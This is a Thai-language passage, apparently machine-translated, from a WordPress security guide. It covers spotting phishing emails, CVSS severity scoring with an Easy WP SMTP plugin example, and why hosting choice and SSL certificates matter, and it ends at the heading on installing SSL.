ฟิชชิ่งเป็นวิธีการโจมตีทางไซเบอร์โดยใช้อีเมล โซเชียลมีเดีย ข้อความ และการโทรศัพท์เพื่อหลอกล่อเหยื่อให้เปิดเผยข้อมูลส่วนบุคคล ผู้โจมตีจะใช้ข้อมูลเพื่อเข้าถึงบัญชีส่วนบุคคลหรือกระทำการฉ้อโกงข้อมูลประจำตัว

วิธีสังเกตอีเมลฟิชชิ่ง

ตามที่เราได้เรียนรู้ก่อนหน้านี้ในโพสต์นี้ ช่องโหว่บางอย่างต้องการการโต้ตอบกับผู้ใช้บางประเภทจึงจะใช้ประโยชน์ได้ วิธีหนึ่งที่แฮ็กเกอร์หลอกให้ผู้คนเข้าร่วมในความพยายามที่ชั่วร้ายของพวกเขาคือการส่งอีเมลฟิชชิ่ง

การเรียนรู้วิธีสังเกตอีเมลฟิชชิ่งสามารถช่วยให้คุณไม่ต้องเล่นแผนของอาชญากรไซเบอร์โดยไม่ได้ตั้งใจ

เคล็ดลับ 4 ข้อในการตรวจจับอีเมลฟิชชิ่ง :

1. ดูที่อยู่อีเมลจาก – หากคุณได้รับอีเมลจากธุรกิจ ส่วนของที่อยู่อีเมลของผู้ส่งหลัง “@” ควรตรงกับชื่อธุรกิจ
   
   หากอีเมลเป็นตัวแทนของบริษัทหรือหน่วยงานภาครัฐ แต่ใช้ที่อยู่อีเมลสาธารณะ เช่น “@gmail” แสดงว่าอีเมลฟิชชิง
   
   จับตาดูการสะกดผิดเล็กน้อยของชื่อโดเมน ตัวอย่างเช่น ลองดูที่อยู่อีเมลนี้ [email protected] เราจะเห็นว่า Netflix มีเครื่องหมาย “x” พิเศษต่อท้าย การสะกดผิดเป็นสัญญาณชัดเจนว่าอีเมลถูกส่งโดยผู้หลอกลวงและควรลบทิ้งทันที
   
2. มองหาข้อผิดพลาดทางไวยากรณ์ – อีเมลที่เต็มไปด้วยข้อผิดพลาดทางไวยากรณ์เป็นสัญญาณของอีเมลที่เป็นอันตราย คำทั้งหมดอาจสะกดถูกต้อง แต่ประโยคเป็นคำที่ขาดหายไปซึ่งจะทำให้ประโยคสอดคล้องกัน ตัวอย่างเช่น “บัญชีของคุณถูกแฮ็ก อัปเดตรหัสผ่านเพื่อความปลอดภัยของบัญชี”
   
   ทุกคนทำผิดพลาด และไม่ใช่ทุกอีเมลที่มีการพิมพ์ผิดหรือสองครั้งที่พยายามหลอกลวงคุณ อย่างไรก็ตาม ข้อผิดพลาดทางไวยากรณ์หลายข้อรับประกันว่าจะต้องตรวจสอบอย่างละเอียดก่อนจะตอบกลับ
   
3. ไฟล์แนบหรือลิงก์ที่น่าสงสัย – ควรหยุดสักครู่ก่อนที่จะโต้ตอบกับไฟล์แนบหรือลิงก์ที่รวมอยู่ในอีเมล
   
   หากคุณไม่รู้จักผู้ส่งอีเมล คุณไม่ควรดาวน์โหลดไฟล์แนบที่รวมอยู่ในอีเมล เนื่องจากอาจมีมัลแวร์และติดคอมพิวเตอร์ของคุณ หากอีเมลอ้างว่ามาจากธุรกิจ คุณสามารถ Google ข้อมูลติดต่อของพวกเขาเพื่อยืนยันว่าอีเมลนั้นส่งมาจากพวกเขาก่อนที่จะเปิดไฟล์แนบ
   
   หากอีเมลมีลิงก์ คุณสามารถวางเมาส์เหนือลิงก์เพื่อยืนยันว่า URL กำลังส่งไปยังที่ที่ควรจะเป็น
   
4. ระวังคำขอเร่งด่วน – เคล็ดลับทั่วไปที่ใช้โดยนักต้มตุ๋นคือการสร้างความรู้สึกเร่งด่วน อีเมลที่เป็นอันตรายอาจสร้างสถานการณ์ที่ต้องดำเนินการทันที ยิ่งคุณมีเวลาคิดมากเท่าใด โอกาสที่คุณจะระบุคำขอนั้นก็มาจากผู้หลอกลวงมากขึ้นเท่านั้น
   
   คุณอาจได้รับอีเมลจาก "เจ้านาย" ของคุณที่ขอให้คุณชำระเงินให้กับผู้ขายโดยเร็ว หรือจากธนาคารของคุณเพื่อแจ้งว่าบัญชีของคุณถูกแฮ็กและจำเป็นต้องดำเนินการในทันที

วิธีวัดความรุนแรงของช่องโหว่ WordPress

ช่องโหว่ WordPress มีหลายประเภท โดยทั้งหมดมีระดับความเสี่ยงที่แตกต่างกัน โชคดีสำหรับเรา ฐานข้อมูลช่องโหว่แห่งชาติ ซึ่งเป็นโครงการของสถาบันวิทยาศาสตร์และเทคโนโลยีแห่งชาติ มีเครื่องคำนวณระบบการให้คะแนนช่องโหว่เพื่อกำหนดความเสี่ยงของช่องโหว่

ส่วนนี้ของคู่มือช่องโหว่ WordPress จะครอบคลุมตัวชี้วัดและระดับความรุนแรงของระบบการให้คะแนนช่องโหว่ แม้ว่าส่วนนี้จะค่อนข้างเป็นเทคนิคมากกว่าเล็กน้อย ผู้ใช้บางคนอาจพบว่ามีประโยชน์สำหรับการทำความเข้าใจอย่างลึกซึ้งถึงวิธีการประเมินช่องโหว่ของ WordPress และความรุนแรง

ตัวชี้วัดระบบการให้คะแนนช่องโหว่ WordPress ทั่วไป

สมการของระบบการให้คะแนนช่องโหว่ใช้ชุดคะแนนที่แตกต่างกันสามชุดเพื่อกำหนดคะแนนความรุนแรงโดยรวม

1. เมตริกพื้นฐาน

กลุ่มเมทริกพื้นฐานแสดงถึงลักษณะของช่องโหว่ที่คงที่ในสภาพแวดล้อมของผู้ใช้

เมทริกพื้นฐานแบ่งออกเป็นสองกลุ่ม ได้แก่ Exploitability และ Impact

1.1. ตัวชี้วัดความสามารถในการใช้ประโยชน์

คะแนนความสามารถในการหาช่องโหว่นั้นขึ้นอยู่กับความยากของผู้โจมตีในการใช้ประโยชน์จากช่องโหว่ คะแนนคำนวณโดยใช้ตัวแปรต่างๆ 5 ตัว

1.1.1. โจมตีเวกเตอร์ (AV)

คะแนนเวกเตอร์การโจมตีขึ้นอยู่กับวิธีการที่ใช้ช่องโหว่ คะแนนจะสูงขึ้นตามระยะไกลที่ผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ได้

แนวคิดก็คือจำนวนผู้โจมตีที่มีศักยภาพจะเพิ่มมากขึ้นหากช่องโหว่นั้นสามารถถูกโจมตีผ่านเครือข่ายได้ เมื่อเทียบกับช่องโหว่ที่ต้องมีการเข้าถึงทางกายภาพเพื่อใช้ประโยชน์จากอุปกรณ์

ยิ่งมีผู้โจมตีที่มีศักยภาพมากเท่าใด ความเสี่ยงในการแสวงหาผลประโยชน์ก็จะยิ่งสูงขึ้น ดังนั้นคะแนน Attack Vector ที่มอบให้กับช่องโหว่นั้นก็จะสูงขึ้น

1.1.2. ความซับซ้อนของการโจมตี (AC)

ค่าความซับซ้อนขึ้นอยู่กับเงื่อนไขที่จำเป็นในการใช้ประโยชน์จากช่องโหว่ เงื่อนไขบางอย่างอาจต้องการการรวบรวมข้อมูลเพิ่มเติมเกี่ยวกับเป้าหมาย การมีอยู่ของการตั้งค่าการกำหนดค่าระบบบางอย่าง หรือข้อยกเว้นทางคอมพิวเตอร์

คะแนนความซับซ้อนในการโจมตีจะสูงขึ้นตามความซับซ้อนที่จำเป็นต่อการใช้ประโยชน์จากช่องโหว่ที่ต่ำลง

1.1.3. สิทธิ์ที่จำเป็น (PR)

คะแนนที่ต้องใช้สิทธิ์จะคำนวณตามสิทธิ์ที่ผู้โจมตีต้องได้รับก่อนที่จะใช้ประโยชน์จากช่องโหว่ เราจะเจาะลึกเรื่องนี้อีกเล็กน้อยในส่วน Authenticated vs. Unauthenticated

คะแนนจะสูงสุดหากไม่มีสิทธิพิเศษใดๆ

1.1.4. การโต้ตอบกับผู้ใช้ (UI)

คะแนนการโต้ตอบของผู้ใช้จะพิจารณาจากช่องโหว่ที่ผู้ใช้โต้ตอบเพื่อแสวงหาประโยชน์หรือไม่

คะแนนจะสูงสุดเมื่อผู้ใช้ไม่จำเป็นต้องโต้ตอบกับผู้โจมตีเพื่อใช้ประโยชน์จากช่องโหว่

1.1.5. ขอบเขต

คะแนนขอบเขตขึ้นอยู่กับช่องโหว่ในองค์ประกอบซอฟต์แวร์หนึ่งที่จะส่งผลกระทบต่อทรัพยากรที่อยู่นอกเหนือขอบเขตความปลอดภัย

ขอบเขตการรักษาความปลอดภัยครอบคลุมส่วนประกอบอื่นๆ ที่มีฟังก์ชันการทำงานเฉพาะกับส่วนประกอบนั้น แม้ว่าส่วนประกอบอื่นๆ เหล่านี้จะมีอำนาจด้านความปลอดภัยของตนเองก็ตาม

คะแนนจะสูงสุดเมื่อมีการเปลี่ยนแปลงขอบเขต

1.2. ตัวชี้วัดผลกระทบ

ตัววัดผลกระทบจะจับผลกระทบโดยตรงของช่องโหว่ที่ถูกเอารัดเอาเปรียบได้สำเร็จ

1.2.1. ผลกระทบที่เป็นความลับ (C)

คะแนนผลกระทบที่เป็นความลับนี้จะวัดผลกระทบต่อการรักษาความลับของข้อมูลที่จัดการโดยซอฟต์แวร์ที่ถูกโจมตี

คะแนนจะสูงสุดเมื่อการสูญเสียซอฟต์แวร์ที่ได้รับผลกระทบสูงที่สุด

1.2.2. ความซื่อสัตย์ (I)

คะแนนความสมบูรณ์นี้อิงจากผลกระทบต่อความสมบูรณ์ของช่องโหว่ที่ถูกเอารัดเอาเปรียบที่ประสบความสำเร็จ

คะแนนจะสูงสุดเมื่อผลของซอฟต์แวร์ที่ได้รับผลกระทบมากที่สุด

1.2.3. ความพร้อมใช้งาน (A)

คะแนนความพร้อมใช้งานขึ้นอยู่กับผลกระทบของความพร้อมใช้งานของซอฟต์แวร์ที่ถูกโจมตี

คะแนนจะสูงสุดเมื่อผลที่ตามมาขององค์ประกอบที่ได้รับผลกระทบมากที่สุด

คะแนนฐาน CVSS การคำนวณคะแนน

คะแนนฐานเป็นฟังก์ชันของสมการคะแนนย่อยผลกระทบและการใช้ประโยชน์ โดยที่คะแนนฐานถูกกำหนดเป็น

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. ตัวชี้วัดคะแนนชั่วคราว

ตัวชี้วัด Temporal จะวัดสถานะปัจจุบันของเทคนิคการหาช่องโหว่ การมีอยู่ของโปรแกรมแก้ไขหรือวิธีแก้ไขปัญหาชั่วคราว หรือความมั่นใจที่มีในคำอธิบายของช่องโหว่

เมตริกชั่วคราวคาดว่าจะเปลี่ยนแปลงและจะเปลี่ยนแปลงเมื่อเวลาผ่านไป

2.1. Exploit Code ครบกำหนด (E)

การกำหนดอายุของรหัสช่องโหว่นั้นขึ้นอยู่กับโอกาสที่ช่องโหว่จะถูกโจมตี

ยิ่งสามารถใช้ประโยชน์จากช่องโหว่ได้ง่ายขึ้น คะแนนความเสี่ยงก็จะยิ่งสูงขึ้น

2.2. ระดับการแก้ไข (RL)

ระดับการแก้ไขของช่องโหว่เป็นปัจจัยสำคัญสำหรับการจัดลำดับความสำคัญ วิธีแก้ปัญหาหรือโปรแกรมแก้ไขด่วนอาจเสนอวิธีแก้ไขชั่วคราวจนกว่าจะมีการออกโปรแกรมแก้ไขหรืออัปเกรดอย่างเป็นทางการ

การแก้ไขที่เป็นทางการและถาวรน้อยกว่า คะแนนช่องโหว่ก็จะยิ่งสูงขึ้น

2.3. รายงานความมั่นใจ (RC)

เมตริกรายงานความเชื่อมั่นจะวัดระดับความเชื่อมั่นว่ามีช่องโหว่และความน่าเชื่อถือของรายละเอียดทางเทคนิค

ยิ่งมีการตรวจสอบช่องโหว่โดยผู้ขายหรือแหล่งที่เชื่อถือได้อื่น ๆ คะแนนก็จะยิ่งสูงขึ้น

การคำนวณคะแนน CVSS ชั่วคราว

คะแนนชั่วคราวถูกกำหนดเป็น

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. ตัวชี้วัดคะแนนสิ่งแวดล้อม

ตัวชี้วัดด้านสิ่งแวดล้อมช่วยให้นักวิเคราะห์ปรับแต่งคะแนน CVSS ตามความสำคัญของสินทรัพย์ไอทีที่ได้รับผลกระทบ

ตัวชี้วัดความสามารถในการใช้ประโยชน์ด้านสิ่งแวดล้อมและผลกระทบนั้นเทียบเท่ากับตัววัดฐานที่ได้รับการแก้ไขแล้ว และได้รับการกำหนดค่าตามการจัดวางองค์ประกอบของโครงสร้างพื้นฐานขององค์กร ดูส่วนเมตริกพื้นฐานด้านบนเพื่อดูค่าและคำอธิบายของเมตริกการใช้ประโยชน์และผลกระทบ

ตัวชี้วัดด้านสิ่งแวดล้อมประกอบด้วยกลุ่มพิเศษ ตัวแก้ไขคะแนนย่อยของผลกระทบ

3.1. ตัวแก้ไขคะแนนย่อยของผลกระทบ

ตัวชี้วัด Impact Subscore Modifiers จะประเมินข้อกำหนดด้านความปลอดภัยเฉพาะสำหรับ Confidentiality (CR), Integrity (IR) และ Availability (AR) ซึ่งช่วยให้ปรับแต่งคะแนนด้านสิ่งแวดล้อมได้ตามสภาพแวดล้อมของผู้ใช้

การคำนวณคะแนน CVSS ด้านสิ่งแวดล้อม

คะแนนสิ่งแวดล้อมถูกกำหนดเป็น

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

คะแนน CVSS โดยรวมและความรุนแรง

ระบบการให้คะแนนช่องโหว่ทั่วไปโดยรวมหรือคะแนน CVSS เป็นตัวแทนของคะแนนฐาน เวลา และสิ่งแวดล้อม

คะแนน CVSS โดยรวมสามารถใช้เพื่อให้คุณทราบว่าช่องโหว่นั้นรุนแรงหรือร้ายแรงเพียงใด

ตัวอย่างการจัดอันดับความรุนแรง CVSS ของโลกแห่งความเป็นจริง

ในบทสรุปของช่องโหว่ในเดือนธันวาคม 2020 เรารายงานเกี่ยวกับช่องโหว่ในปลั๊กอิน Easy WP SMTP ช่องโหว่ Zero-day (เราจะกล่าวถึงช่องโหว่ Zero-day ในส่วนถัดไป) ช่องโหว่ดังกล่าวอนุญาตให้ผู้โจมตีเข้าควบคุมบัญชีผู้ดูแลระบบและถูกโจมตีโดยไม่ได้ตั้งใจ

เมื่อดูที่รายการ National Vulnerability Database เราจะสามารถค้นหาระดับความรุนแรงของช่องโหว่ WP SMTP

มาดูรายละเอียดสองสามอย่างจากภาพหน้าจอ WP SMTP NVDB ด้านบนกัน

คะแนนฐาน : คะแนน ฐานคือ 7.5 ซึ่งบอกเราว่าระดับความรุนแรงของช่องโหว่นั้นสูง

เวกเตอร์ : เวกเตอร์บอกเราว่าคะแนนนั้นขึ้นอยู่กับสมการช่องโหว่ CVSS 3.1 และตัวชี้วัดที่ใช้ในการคำนวณคะแนน

นี่คือส่วนเมตริกของเวกเตอร์

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

ตอนนี้ ลองใช้ค่าเมตริกพื้นฐานและคำอธิบายจากช่วงต้นของโพสต์นี้เพื่อทำความเข้าใจค่าเมตริกทั้งแปดของเวกเตอร์

1. AV:N – หมายความว่า Attack Vector (AV) ของช่องโหว่คือ Network (N) กล่าวอีกนัยหนึ่ง ผู้โจมตีต้องการการเข้าถึงเครือข่ายเพื่อใช้ประโยชน์จากช่องโหว่เท่านั้น
2. AC:L – ความซับซ้อนของการโจมตี (AC) ของช่องโหว่อยู่ในระดับต่ำ (L) กล่าวอีกนัยหนึ่งตัวเล็กสคริปต์ใด ๆ สามารถใช้ประโยชน์จากช่องโหว่นี้ได้
3. PR:N – สิทธิ์ที่จำเป็น (PR) ที่จำเป็นในการใช้ประโยชน์จากช่องโหว่คือไม่มี (N) ดังนั้น ช่องโหว่นี้จึงไม่ต้องการให้ผู้ใช้ที่ได้รับการรับรองความถูกต้องเพื่อใช้ประโยชน์ (เราจะกล่าวถึงความแตกต่างระหว่างช่องโหว่ที่ตรวจสอบสิทธิ์และไม่ได้ตรวจสอบสิทธิ์ในโพสต์นี้)
4. UI:N – การโต้ตอบกับผู้ใช้ (UI) ที่จำเป็นในการใช้ประโยชน์จากช่องโหว่นี้คือไม่มี (N) ดังนั้น ผู้โจมตีจึงมีวิธีการที่จะใช้ประโยชน์จากจุดอ่อนนั้นด้วยตนเอง
5. S:U – หมายความว่าขอบเขต (S) ของช่องโหว่นั้นไม่เปลี่ยนแปลง (U) ในกรณีของช่องโหว่นี้ องค์ประกอบที่มีช่องโหว่และส่วนประกอบที่ได้รับผลกระทบจะเหมือนกัน
6. C:H – Confidentiality Impact (C) ของช่องโหว่อยู่ในระดับสูง (H) เมื่อมีการใช้ประโยชน์จากช่องโหว่นี้จะส่งผลให้สูญเสียความลับทั้งหมด
7. I:N – Integrity Impact (I) ของช่องโหว่นี้คือไม่มี (N) เมื่อมีการใช้ประโยชน์จากช่องโหว่ จะไม่มีการสูญเสียความสมบูรณ์หรือความน่าเชื่อถือของข้อมูลที่มีช่องโหว่
8. A:N – หมายความว่า Availability Impact (A) คือ None (N) เมื่อมีการใช้ประโยชน์จากช่องโหว่ จะไม่มีผลกระทบต่อความพร้อมใช้งานของเว็บไซต์ของคุณ

คะแนน CVSS สามารถช่วยเราระบุความรุนแรงและขอบเขตของช่องโหว่ที่กำหนดได้ ในสองส่วนถัดไป เราจะกล่าวถึงคำศัพท์เกี่ยวกับช่องโหว่ที่สำคัญซึ่งมักรวมอยู่ในการเปิดเผยช่องโหว่

ห่อ

ในส่วนนี้ เราได้เรียนรู้องค์ประกอบที่สำคัญหลายประการของการรักษาความปลอดภัย WordPress รวมถึงแรงจูงใจของแฮกเกอร์ การแฮ็กประเภทต่างๆ ช่องโหว่ที่อาชญากรออนไลน์หาประโยชน์ วิธีลดความเสี่ยงของช่องโหว่ และวิธีระบุความเสี่ยงที่ช่องโหว่มีต่อคุณ เว็บไซต์.

การทำความเข้าใจวิธีที่ผู้โจมตีพยายามแฮ็คเว็บไซต์ของเราและเป้าหมายของพวกเขาหลังจากละเมิดเว็บไซต์ของเราช่วยให้เราสามารถสร้างการป้องกันที่เหมาะสมได้

ในส่วนต่อๆ ไป คุณจะได้เรียนรู้วิธีปกป้องเว็บไซต์ของคุณจากการโจมตีแทบทุกรูปแบบที่แฮ็กเกอร์สามารถโจมตีคุณได้

ส่วนที่ 4: การรักษาความปลอดภัยเซิร์ฟเวอร์ของคุณ

ขั้นตอนแรกในกลยุทธ์การรักษาความปลอดภัยของ WordPress คือการรักษาความปลอดภัยเซิร์ฟเวอร์ของคุณ เซิร์ฟเวอร์ของคุณเก็บไฟล์และรหัสทั้งหมดที่ทำให้เว็บไซต์ของคุณทำงาน

ในส่วนนี้คุณจะได้เรียนรู้:

1. ความสำคัญของการเลือกเจ้าบ้านที่ดี
2. วิธีเข้ารหัสการสื่อสารบนเว็บไซต์ของคุณ
3. ไฟร์วอลล์สามารถช่วยรักษาความปลอดภัยให้กับเว็บไซต์ของคุณได้อย่างไร

เลือกโฮสติ้งที่เหมาะสม

ไม่ใช่ว่าทุกโฮสต์เว็บจะถูกสร้างขึ้นมาเท่ากัน และการเลือกราคาเพียงอย่างเดียวอาจทำให้คุณเสียค่าใช้จ่ายมากขึ้นในระยะยาวกับปัญหาด้านความปลอดภัยของ WordPress สภาพแวดล้อมการโฮสต์ที่ใช้ร่วมกันส่วนใหญ่มีความปลอดภัย แต่บางส่วนไม่สามารถแยกบัญชีผู้ใช้ได้อย่างเหมาะสม

โฮสต์ของคุณควรระมัดระวังในการใช้แพตช์ความปลอดภัยล่าสุดและปฏิบัติตามแนวทางปฏิบัติด้านความปลอดภัย WordPress ที่สำคัญอื่น ๆ ที่เกี่ยวข้องกับความปลอดภัยของเซิร์ฟเวอร์และไฟล์ โฮสต์ของคุณควรระมัดระวังในการใช้แพตช์ความปลอดภัยล่าสุดและปฏิบัติตามแนวทางปฏิบัติที่ดีที่สุดด้านความปลอดภัยสำหรับโฮสต์ที่สำคัญอื่นๆ ที่เกี่ยวข้องกับความปลอดภัยของเซิร์ฟเวอร์และไฟล์

เข้ารหัสไซต์ WordPress ของคุณด้วย SSL

Secure Sockets Layer หรือที่เรียกว่า SSL เป็นเทคโนโลยีความปลอดภัยที่ให้การเข้ารหัสระหว่างไคลเอนต์และเว็บเซิร์ฟเวอร์ เพื่อให้เข้าใจเรื่องนี้ง่ายขึ้น "ไคลเอ็นต์" คือเว็บเบราว์เซอร์เช่น Chrome หรือ Safari และ "เว็บเซิร์ฟเวอร์" คือเว็บไซต์หรือร้านค้าออนไลน์ของคุณ

วิธีง่ายๆ ที่จะบอกว่าเว็บไซต์ที่คุณกำลังเยี่ยมชมมีใบรับรอง SSL ติดตั้งอยู่หรือไม่ ให้ดูในแถบที่อยู่ของเบราว์เซอร์เพื่อดูว่า URL ขึ้นต้นด้วย HTTP หรือ HTTPS หรือไม่ หาก URL ขึ้นต้นด้วย HTTPS แสดงว่าคุณกำลังท่องเว็บไซต์โดยใช้ SSL อย่างปลอดภัย

เหตุใด SSL จึงมีความสำคัญมาก?

การไม่มี ใบรับรอง SSL ในปี 2564 นั้นมีราคาแพง ทำไม? หากคุณไม่ได้เปิดใช้งาน SSL บนเว็บไซต์ของคุณ ผู้มีโอกาสเป็นลูกค้าจะค้นพบการมีอยู่ของคุณได้ยากขึ้น และผู้ที่พบเว็บไซต์ของคุณอาจกลัวที่จะให้เงินกับคุณ

ทุกครั้งที่เราทำการซื้อทางออนไลน์ จะมีการสื่อสารเกิดขึ้นระหว่างเบราว์เซอร์ของคุณกับร้านค้าออนไลน์ ตัวอย่างเช่น เมื่อเราป้อนหมายเลขบัตรเครดิตลงในเบราว์เซอร์ เบราว์เซอร์ของเราจะแบ่งปันหมายเลขกับร้านค้าออนไลน์ หลังจากที่ร้านค้าได้รับการชำระเงินแล้ว ร้านค้าจะแจ้งเบราว์เซอร์ของคุณเพื่อแจ้งให้คุณทราบว่าการสั่งซื้อของคุณสำเร็จ

สิ่งหนึ่งที่ควรคำนึงถึงเกี่ยวกับข้อมูลที่แชร์ระหว่างเบราว์เซอร์ของเรากับเซิร์ฟเวอร์ของร้านค้าก็คือ ข้อมูลดังกล่าวทำให้หยุดการขนส่งหลายครั้ง SSL ให้การเข้ารหัสในการสื่อสารเพื่อให้แน่ใจว่าจะไม่มีใครเห็นบัตรเครดิตของเราจนกว่าจะถึงปลายทางสุดท้ายของเซิร์ฟเวอร์ของร้านค้า

เพื่อให้เข้าใจถึงวิธีการทำงานของการเข้ารหัสได้ดียิ่งขึ้น ให้นึกถึงวิธีการส่งสินค้าที่ซื้อของเรา หากคุณเคยติดตามสถานะการจัดส่งของการสั่งซื้อออนไลน์ คุณจะเห็นว่าคำสั่งซื้อของคุณหยุดหลายครั้งก่อนที่จะมาถึงบ้านของคุณ หากผู้ขายไม่ได้จัดแพคเกจการซื้อของคุณอย่างถูกต้อง ผู้คนจะเห็นสิ่งที่คุณซื้อได้ง่าย

SSL เป็นเครื่องมือสำคัญในการป้องกันผู้ไม่หวังดีจากการดักจับข้อมูลที่ละเอียดอ่อน เช่น รหัสผ่านและหมายเลขบัตรเครดิตที่แชร์ระหว่างไคลเอนต์และเว็บเซิร์ฟเวอร์

เหตุใดใบรับรอง SSL จึงเป็นสิ่งที่ต้องมีสำหรับทุกเว็บไซต์

ประโยชน์ของความปลอดภัยของ WordPress ที่คุณได้รับจากการมีใบรับรอง SSL บนเว็บไซต์ของคุณก็เพียงพอแล้วที่จะทำให้มันเป็นสิ่งจำเป็นสำหรับเว็บไซต์ใดๆ อย่างไรก็ตาม เพื่อเป็นการสนับสนุนให้ทุกคนปกป้องผู้เข้าชมเว็บไซต์ เว็บเบราว์เซอร์และเครื่องมือค้นหาจึงสร้างแรงจูงใจเชิงลบเพื่อสนับสนุนให้ทุกคนใช้ SSL ในส่วนนี้ เราจะกล่าวถึงผลที่ตามมาของการไม่เปิดใช้งาน SSL บนเว็บไซต์ของคุณ

1. การไม่เปิดใช้งาน SSL จะทำให้อันดับ SEO ของคุณเสียหาย

Search Engine Optimization หรือ SEO เป็นกระบวนการปรับแต่งเว็บไซต์ของคุณให้ถูกค้นพบโดยธรรมชาติผ่านหน้าผลลัพธ์ของเครื่องมือค้นหา ประโยชน์ของ SEO คือเป็นวิธีที่ยอดเยี่ยมในการเพิ่มการเข้าชมแบบออร์แกนิกและแบบไม่ชำระเงินมายังไซต์ของคุณ หากคุณขายหลักสูตรทำขนมปัง คุณต้องการให้เว็บไซต์ของคุณอยู่ในหน้าแรกของผลลัพธ์สำหรับผู้ที่ค้นหาใน Google หรือหลักสูตร Duck Duck Go สำหรับการทำขนมปัง

หากไม่มีการเปิดใช้งาน SSL บนไซต์ของคุณ เครื่องมือค้นหาจะลงโทษคุณและดาวน์เกรดการจัดอันดับของคุณ เมตริกหนึ่งที่ Google ใช้ในการจัดอันดับเว็บไซต์ในผลการค้นหาคือความน่าเชื่อถือ ไม่ควรส่งผู้ใช้ไปยังเว็บไซต์ที่ไม่ปลอดภัยของ Google เพื่อประโยชน์สูงสุดของ Google ดังนั้นความน่าเชื่อถือจึงมีน้ำหนักมากในอัลกอริธึมการจัดอันดับ ด้วย SSL ที่เพิ่มการรักษาความปลอดภัยอย่างมาก จึงเป็นส่วนสำคัญที่ทำให้ Google ให้คะแนนความน่าเชื่อถือของเว็บไซต์

2. เบราว์เซอร์ทำเครื่องหมายไซต์ที่ไม่ใช่ SSL ว่าไม่ปลอดภัย

อีกวิธีหนึ่งที่ไม่ได้เปิดใช้งาน SSL จะทำให้คุณเสียค่าใช้จ่ายคือเบราว์เซอร์ของผู้เยี่ยมชมจะเตือนพวกเขาว่าไซต์ของคุณไม่ปลอดภัย ที่เรากล่าวถึงก่อนหน้านี้หลังจากที่คุณติดตั้งใบรับรอง SSL บนเว็บไซต์ของคุณ URL ของเว็บไซต์ของคุณจะเปลี่ยนรูปแบบ http: //yourwebsite.com เพื่อ https: // yourwebsite / ดอทคอม ตัวอย่างเช่น Chrome จะทำเครื่องหมายหน้าเว็บที่เข้ารหัส HTTPS ว่าปลอดภัยด้วยแม่กุญแจที่ล็อกไว้ อีกวิธีหนึ่ง Chrome จะแทนที่แม่กุญแจที่ล็อกไว้สำหรับหน้าเว็บที่ไม่ได้เข้ารหัส HTTP ทั้งหมดด้วยข้อความ Not Secure

ฉันจะไม่ซื้อของบนเว็บไซต์ที่เบราว์เซอร์ทำเครื่องหมายว่าไม่ปลอดภัย และไม่ใช่คนเดียวที่ไม่ซื้อ จากการศึกษาโดย GlobalSign 85% ของผู้ซื้อออนไลน์หลีกเลี่ยงเว็บไซต์ที่ไม่ปลอดภัย โปรดทราบว่าในปี 2021 จำเป็นต้องมีเว็บไซต์ทั้งหมดของคุณที่ใช้ HTTPS ไม่ใช่แค่เพียงหน้าเข้าสู่ระบบและชำระเงิน ผู้มีโอกาสเป็นลูกค้าอาจไม่สามารถทำการชำระเงินที่ปลอดภัยได้หากหน้าเว็บร้านค้าถูกทำเครื่องหมายว่าไม่ปลอดภัยโดยเว็บเบราว์เซอร์ของพวกเขา

3. คุณอาจสูญเสียลูกค้าที่มีศักยภาพ

การปกป้องลูกค้าของคุณเป็นเหตุผลสำคัญในการเปิดใช้งาน SSL บนเว็บไซต์ของคุณ หากพวกเขาเต็มใจที่จะมอบความไว้วางใจให้คุณทำธุรกิจ อย่างน้อยที่สุดที่คุณสามารถทำได้คือตอบแทนความไว้วางใจนั้นด้วยการปกป้องพวกเขาด้วยพลังแห่งการเข้ารหัส

หากแฮ็กเกอร์สามารถขโมยรายละเอียดบัตรเครดิตของลูกค้าของคุณได้เนื่องจากไม่มีการเข้ารหัสในเว็บไซต์ของคุณ คุณจะไม่เพียงสูญเสียความไว้วางใจของพวกเขา แต่คุณจะสูญเสียธุรกิจในอนาคตของพวกเขาด้วย

ฉันจะทราบได้อย่างไรว่าเว็บไซต์ของฉันเปิดใช้งาน SSL แล้ว

วิธีง่ายๆ ที่จะบอกว่าเว็บไซต์ของคุณมีใบรับรอง SSL ติดตั้งอยู่หรือไม่ ให้ดูในแถบที่อยู่ของเบราว์เซอร์เพื่อดูว่า URL ขึ้นต้นด้วย HTTP หรือ HTTPS หรือไม่ หาก URL ขึ้นต้นด้วย HTTPS แสดงว่าเว็บไซต์ของคุณปลอดภัยด้วย SSL

คุณยังสามารถใช้ตัวตรวจสอบ SSL เช่น SSL Labs ตัวตรวจสอบ SSL จะสแกนไซต์ของคุณเพื่อหาใบรับรอง SSL และจะแจ้งให้คุณทราบเมื่อใบรับรอง SSL ของคุณถูกตั้งค่าให้หมดอายุ

ฉันจะติดตั้งใบรับรอง SSL บนเว็บไซต์ WordPress ของฉันได้อย่างไร

